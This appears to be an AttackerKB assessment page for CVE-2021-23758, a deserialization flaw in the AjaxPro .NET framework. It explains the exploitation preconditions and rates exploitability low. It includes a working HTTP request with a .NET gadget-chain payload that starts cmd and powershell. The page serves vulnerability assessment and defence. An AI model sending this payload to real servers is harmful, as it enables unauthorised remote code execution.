Moderate
CVE-2021-23758
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2021-23758
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
All versions of package ajaxpro.2 are vulnerable to Deserialization of Untrusted Data due to the possibility of deserialization of arbitrary .NET classes, which can be abused to gain remote code execution.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery Low
-
ExploitabilityVery Low
Technical Analysis
Ajax.NET Professional better known as AjaxPro is an AJAX framework available for Microsoft ASP.NET. At the time of discovery of this deserialization RCE vulnerability, there were approximately 30,000 instances of AjaxPro in use. “Woah, scary! So many vulnerable instances” one might say, however do not be alarmed, this vulnerability is quite difficult to exploit.
Vulnerable versions (versions prior to 21.10.30.1
) contain example classes which demonstrate how you might implement the functionality of AjaxPro. These classes are not actually used by the framework. However one class in particular, the “ICartService” demonstrates how to construct a configuration which is vulnerable to this deserialization vulnerability.
1 namespace AjaxPro.Services 2{ 3 [AjaxNamespace("AjaxPro.Services.Cart")] 4 public abstract class ICartService 5 { 6 /// <summary> 7 /// Adds the item. 8 /// </summary> 9 /// <param name="cartName">Name of the cart.</param> 10 /// <param name="item">The item.</param> 11 /// <returns></returns> 12 [AjaxMethod] 13 public abstract bool AddItem(string cartName, object item); 14 15 /// <summary> 16 /// Gets the items. 17 /// </summary> 18 /// <param name="cartName">Name of the cart.</param> 19 /// <returns></returns> 20 [AjaxMethod] 21 public abstract object[] GetItems(string cartName); 22 } 23}
If this example were to be hosted by the application it would allow us to gain remote code execution by sending the following get request:
POST /ajaxpro/AjaxPro.Services.ICartService,AjaxPro.2.ashx HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 X-AjaxPro-Method: AddItem Content-Type: text/plain; charset=utf-8 Content-Length: 4670 {"item":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start","ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c powershell.exe <insert payload here>"}}}}
It is important to note what parameters in the codebase the attacker needs to be privy to in order to exploit this vulnerability as it is unlikely an origination would go out of its way to host this specific example. In order to exploit the attacker needs to know:
- The
Namespace
, which is hosting the vulnerable Ajax Method.
- The
Method
name, which is sent in theX-AjaxPro-Method
header.
- The
Object
name, which contains the payload that gets passed to the vulnerable deserialization.
Every vulnerable instance of AjaxPro will implement the three above parameters differently depending on what the application designed to do, unless of course the developers lazily copy and pasted this example without changing a thing which is possible. Take for example, this application which was built by @numanturle specifically for demonstrating this vulnerability:
namespace CVE_2021_23758_POC { public partial class demo : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { AjaxPro.Utility.RegisterTypeForAjax(typeof(demo)); } [AjaxPro.AjaxMethod] public static String TestAjax(Object obj) { UserInfo u = obj as UserInfo; return u.Name; } } }
See how the Namespace
(CVE_2021_23758_POC), Method
(TestAjax) and Object
(obj) are all different and application specific. This vulnerability is not feasibly exploitable from a black box perspective, you need information about how the vulnerable code has been implemented – this is reflected in the Attacker Value and exploitability ratings.
References
https://github.com/numanturle/CVE-2021-23758-POC/tree/main
https://github.com/michaelschwarz/Ajax.NET-Professional/
https://github.com/rapid7/metasploit-framework/pull/18494
https://mogwailabs.de/en/blog/2022/01/vulnerability-spotlight-rce-in-ajax.net-professional/
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- ajaxpro.2 project
Products
- ajaxpro.2
References
Miscellaneous
Additional Info
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below: